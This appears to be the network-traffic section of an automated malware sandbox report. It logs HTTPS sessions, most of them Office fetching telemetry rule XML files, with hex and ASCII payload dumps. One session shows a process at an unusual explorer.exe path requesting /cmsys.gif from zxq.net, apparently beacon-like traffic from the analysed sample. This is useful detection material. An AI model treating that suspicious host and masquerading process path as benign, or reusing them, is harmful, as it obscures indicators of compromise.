                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    48192.168.2.54977213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:26 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 423
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                    x-ms-request-id: 214f201b-c01e-00ad-7c26-28a2b9000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120826Z-r197bdfb6b4zd9tpkpdngrtchw00000005q000000000a3xm
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    49192.168.2.54977351.81.194.2024432920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC193OUTGET /cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Host: zxq.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:26 UTC614INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                    link: <https://zxq.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                    x-redirect-by: WordPress
                                                                                                                                                                                                                                                    location: https://zxq.net/what-happened-to-the-old-zxq-website/
                                                                                                                                                                                                                                                    x-litespeed-cache: hit
                                                                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                                                                    date: Tue, 29 Oct 2024 12:08:26 GMT
                                                                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    50192.168.2.54977413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 478
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                    x-ms-request-id: 6856914c-401e-0029-0667-279b43000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-15b8d89586f6nn8zqg1h5suba800000001tg000000004328
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    51192.168.2.54977613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                    x-ms-request-id: 7ae13fc9-101e-005a-3933-26882b000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-r197bdfb6b4wmcgqdschtyp7yg00000006hg000000000ehm
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    52192.168.2.54977513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                    x-ms-request-id: 5e2f3c3f-901e-0048-1b49-28b800000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-r197bdfb6b4skzzvqpzzd3xetg00000005y0000000003crz
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    53192.168.2.54977713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 400
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                                                                                    x-ms-request-id: 16672fc1-b01e-0001-32e8-2846e2000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-r197bdfb6b4c8q4qvwwy2byzsw00000006u0000000004ahn
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    54192.168.2.54977913.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                                                                                    x-ms-request-id: 395fbb66-201e-003f-4179-266d94000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-16849878b78q9m8bqvwuva4svc000000050g000000009tp8
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    55192.168.2.54978113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:27 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 448
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                    x-ms-request-id: 51ccb76b-001e-0049-0a37-265bd5000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-16849878b78p49s6zkwt11bbkn0000000670000000004fzk
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    56192.168.2.54978213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:27 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:28 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 475
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                                                                                    x-ms-request-id: b14e1d55-401e-0078-709c-274d34000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120827Z-17c5cb586f66g7mvgrudxte95400000001kg000000001pvd
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:28 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    57192.168.2.54978013.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
